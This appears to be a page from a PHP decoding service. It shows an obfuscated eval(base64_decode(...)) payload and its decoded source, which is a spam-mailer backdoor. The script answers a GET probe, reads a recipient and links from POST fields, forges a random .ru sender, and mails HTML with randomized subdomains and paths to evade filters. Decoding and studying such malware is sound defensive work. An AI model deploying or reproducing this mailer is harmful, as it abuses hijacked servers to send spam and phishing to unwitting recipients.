Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KaWYoJF9HRVRbJ20nXSA9PSAxKSB7DQplY2hvICJnb2..
Decoded Output download
error_reporting(0);
if($_GET['m'] == 1) {
echo "good";
echo "8763";
}else{
}
class wolf {
public static function generatePath($cfg) {
$o = '';
for ($i = 0; $i < $cfg['depth']; $i++) {
$o.= self::gen(rand($cfg['min_length'], $cfg['max_length'])) . '/';
}
$o = '/' . rtrim($o, '/');
return $o . '.' . $cfg['extensions'][array_rand($cfg['extensions'])];
}
public static function gen($length = 8) {
$password = "";
$possible = "012346789abcdfghjklmnpqrtuvwxyz";
$maxlength = strlen($possible);
if ($length > $maxlength) {
$length = $maxlength;
}
$i = 0;
while ($i < $length) {
$char = substr($possible, mt_rand(0, $maxlength - 1), 1);
if (!strstr($password, $char)) {
$password .= $char;
$i++;
}
}
return $password;
}
public static function generateSubdomains($cfg) {
$o='';
for ($i = 0; $i < $cfg['depth']; $i++) {
$o.= self::gen(rand($cfg['min_length'], $cfg['max_length'])) . '.';
}
return $o;
}
}
///////////////////////////////////////
//
$cfg2 = array(
'depth' => rand(1,10),// 1 10
'min_length' => 2,
'max_length' => 5,
'extensions'=>array('jpg','png','gif'),
);
///////////////////////////////////////
//
$cfg3 = array(
'depth' => rand(1,5),
'min_length' => 2,
'max_length' => 10,
);
$cfg4 = array(
'depth' => rand(1,10),// 1 10
'min_length' => 2,
'max_length' => 5,
'extensions'=>array('html','shtml','htm'),
);
$v = $_POST['email'];
$url = $_POST['urlredirect'];
$urlimg = $_POST['urlimage'];
$tema = iconv('UTF-8', 'WINDOWS-1251', $_POST['tema']);
$titl = iconv('UTF-8', 'WINDOWS-1251', $_POST['title']);
function funct() {$chars="qazxswedcvfrtgbnhyujmkiolp1234567890";
$max=5;
$size=StrLen($chars)-1;
$password=null;
while($max--)
$password.=$chars[rand(0,$size)];
return $password;
}
$fromail = funct()."@".funct().".ru";
function fun() {
$id=null;
$id=md5(uniqid(rand(),true));
return $id;
}
if($v != '' ) {
echo 'good732';
$imgnum = rand(1,10);
$to = $v;
$subject = $tema;
$message = "<html>
<body>
<a href=\"http://".wolf::generateSubdomains($cfg3)."$url".wolf::generatePath($cfg4)."?r=1\"><img src=\"http://".wolf::generateSubdomains($cfg3)."$urlimg".wolf::generatePath($cfg2)."?m=1\"></a>
</body>
</html>";
$mailheaders = "Content-type:text/html;charset=windows-1251
";
$mailheaders .= "From: $titl <$fromail>
";
$mailheaders .= "Reply-To: $fromail
";
mail($to, $subject, $message, $mailheaders);
}else{
}
Did this file decode correctly?
Original Code
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KaWYoJF9HRVRbJ20nXSA9PSAxKSB7DQplY2hvICJnb29kIjsNCmVjaG8gIjg3NjMiOw0KfWVsc2V7DQp9DQpjbGFzcyB3b2xmIHsNCg0KICAgIHB1YmxpYyBzdGF0aWMgZnVuY3Rpb24gZ2VuZXJhdGVQYXRoKCRjZmcpIHsNCiAgICAgICAgJG8gPSAnJzsNCiAgICAgICAgZm9yICgkaSA9IDA7ICRpIDwgJGNmZ1snZGVwdGgnXTsgJGkrKykgew0KICAgICAgICAgICAgJG8uPSBzZWxmOjpnZW4ocmFuZCgkY2ZnWydtaW5fbGVuZ3RoJ10sICRjZmdbJ21heF9sZW5ndGgnXSkpIC4gJy8nOw0KICAgICAgICB9DQogICAgICAgICRvID0gJy8nIC4gcnRyaW0oJG8sICcvJyk7DQogICAgICAgIHJldHVybiAkbyAuICcuJyAuICRjZmdbJ2V4dGVuc2lvbnMnXVthcnJheV9yYW5kKCRjZmdbJ2V4dGVuc2lvbnMnXSldOw0KICAgIH0NCg0KICAgIHB1YmxpYyBzdGF0aWMgZnVuY3Rpb24gZ2VuKCRsZW5ndGggPSA4KSB7DQogICAgICAgICRwYXNzd29yZCA9ICIiOw0KICAgICAgICAkcG9zc2libGUgPSAiMDEyMzQ2Nzg5YWJjZGZnaGprbG1ucHFydHV2d3h5eiI7DQogICAgICAgICRtYXhsZW5ndGggPSBzdHJsZW4oJHBvc3NpYmxlKTsNCiAgICAgICAgaWYgKCRsZW5ndGggPiAkbWF4bGVuZ3RoKSB7DQogICAgICAgICAgICAkbGVuZ3RoID0gJG1heGxlbmd0aDsNCiAgICAgICAgfQ0KICAgICAgICAkaSA9IDA7DQogICAgICAgIHdoaWxlICgkaSA8ICRsZW5ndGgpIHsNCiAgICAgICAgICAgICRjaGFyID0gc3Vic3RyKCRwb3NzaWJsZSwgbXRfcmFuZCgwLCAkbWF4bGVuZ3RoIC0gMSksIDEpOw0KICAgICAgICAgICAgaWYgKCFzdHJzdHIoJHBhc3N3b3JkLCAkY2hhcikpIHsNCiAgICAgICAgICAgICAgICAkcGFzc3dvcmQgLj0gJGNoYXI7DQogICAgICAgICAgICAgICAgJGkrKzsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gJHBhc3N3b3JkOw0KICAgIH0NCiAgICBwdWJsaWMgc3RhdGljIGZ1bmN0aW9uIGdlbmVyYXRlU3ViZG9tYWlucygkY2ZnKSB7DQogICAgJG89Jyc7DQogICAgZm9yICgkaSA9IDA7ICRpIDwgJGNmZ1snZGVwdGgnXTsgJGkrKykgew0KICAgICAgICAkby49IHNlbGY6OmdlbihyYW5kKCRjZmdbJ21pbl9sZW5ndGgnXSwgJGNmZ1snbWF4X2xlbmd0aCddKSkgLiAnLic7DQogICAgfQ0KICAgIHJldHVybiAkbzsNCn0NCg0KfQ0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vDQovL9Cz0LXQvdC10YDQsNGG0LjRjyDRg9GA0LvQvtCyINC60LDRgNGC0LjQvdC+0LoNCiRjZmcyID0gYXJyYXkoDQogICAgJ2RlcHRoJyA9PiByYW5kKDEsMTApLC8v0L7RgiAxINC00L4gMTANCiAgICAnbWluX2xlbmd0aCcgPT4gMiwNCiAgICAnbWF4X2xlbmd0aCcgPT4gNSwNCiAgICAnZXh0ZW5zaW9ucyc9PmFycmF5KCdqcGcnLCdwbmcnLCdnaWYnKSwNCik7DQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCi8v0LPQtdC90LXRgNCw0YbQuNGPINC/0L7QtNC00L7QvNC10L3QvtCyDQokY2ZnMyA9IGFycmF5KA0KICAgICdkZXB0aCcgPT4gcmFuZCgxLDUpLA0KICAgICdtaW5fbGVuZ3RoJyA9PiAyLA0KICAgICdtYXhfbGVuZ3RoJyA9PiAxMCwNCik7DQokY2ZnNCA9IGFycmF5KA0KICAgICdkZXB0aCcgPT4gcmFuZCgxLDEwKSwvL9C+0YIgMSDQtNC+IDEwDQogICAgJ21pbl9sZW5ndGgnID0+IDIsDQogICAgJ21heF9sZW5ndGgnID0+IDUsDQogICAgJ2V4dGVuc2lvbnMnPT5hcnJheSgnaHRtbCcsJ3NodG1sJywnaHRtJyksDQopOw0KJHYgPSAkX1BPU1RbJ2VtYWlsJ107DQokdXJsID0gJF9QT1NUWyd1cmxyZWRpcmVjdCddOw0KJHVybGltZyA9ICRfUE9TVFsndXJsaW1hZ2UnXTsNCiR0ZW1hID0gaWNvbnYoJ1VURi04JywgJ1dJTkRPV1MtMTI1MScsICRfUE9TVFsndGVtYSddKTsNCiR0aXRsID0gaWNvbnYoJ1VURi04JywgJ1dJTkRPV1MtMTI1MScsICRfUE9TVFsndGl0bGUnXSk7DQpmdW5jdGlvbiBmdW5jdCgpIHskY2hhcnM9InFhenhzd2VkY3ZmcnRnYm5oeXVqbWtpb2xwMTIzNDU2Nzg5MCI7DQokbWF4PTU7IA0KJHNpemU9U3RyTGVuKCRjaGFycyktMTsgDQokcGFzc3dvcmQ9bnVsbDsgDQp3aGlsZSgkbWF4LS0pIA0KJHBhc3N3b3JkLj0kY2hhcnNbcmFuZCgwLCRzaXplKV07DQpyZXR1cm4gJHBhc3N3b3JkOw0KfQ0KJGZyb21haWwgPSBmdW5jdCgpLiJAIi5mdW5jdCgpLiIucnUiOw0KZnVuY3Rpb24gZnVuKCkgew0KJGlkPW51bGw7DQokaWQ9bWQ1KHVuaXFpZChyYW5kKCksdHJ1ZSkpOw0KcmV0dXJuICRpZDsNCn0NCmlmKCR2ICE9ICcnICkgew0KZWNobyAnZ29vZDczMic7DQokaW1nbnVtID0gcmFuZCgxLDEwKTsNCiR0byA9ICR2Ow0KJHN1YmplY3QgPSAkdGVtYTsNCiRtZXNzYWdlID0gIjxodG1sPg0KPGJvZHk+DQo8YSBocmVmPVwiaHR0cDovLyIud29sZjo6Z2VuZXJhdGVTdWJkb21haW5zKCRjZmczKS4iJHVybCIud29sZjo6Z2VuZXJhdGVQYXRoKCRjZmc0KS4iP3I9MVwiPjxpbWcgc3JjPVwiaHR0cDovLyIud29sZjo6Z2VuZXJhdGVTdWJkb21haW5zKCRjZmczKS4iJHVybGltZyIud29sZjo6Z2VuZXJhdGVQYXRoKCRjZmcyKS4iP209MVwiPjwvYT4NCjwvYm9keT4NCjwvaHRtbD4iOw0KJG1haWxoZWFkZXJzID0gIkNvbnRlbnQtdHlwZTp0ZXh0L2h0bWw7Y2hhcnNldD13aW5kb3dzLTEyNTFcclxuIjsgDQokbWFpbGhlYWRlcnMgLj0gIkZyb206ICR0aXRsIDwkZnJvbWFpbD5cclxuIjsgDQokbWFpbGhlYWRlcnMgLj0gIlJlcGx5LVRvOiAkZnJvbWFpbFxyXG4iOyANCm1haWwoJHRvLCAkc3ViamVjdCwgJG1lc3NhZ2UsICRtYWlsaGVhZGVycyk7DQp9ZWxzZXsNCn0"));
Function Calls
base64_decode | 1 |
Stats
MD5 | 1db8687cadb11665c7b46f5821685dde |
Eval Count | 1 |
Decode Time | 85 ms |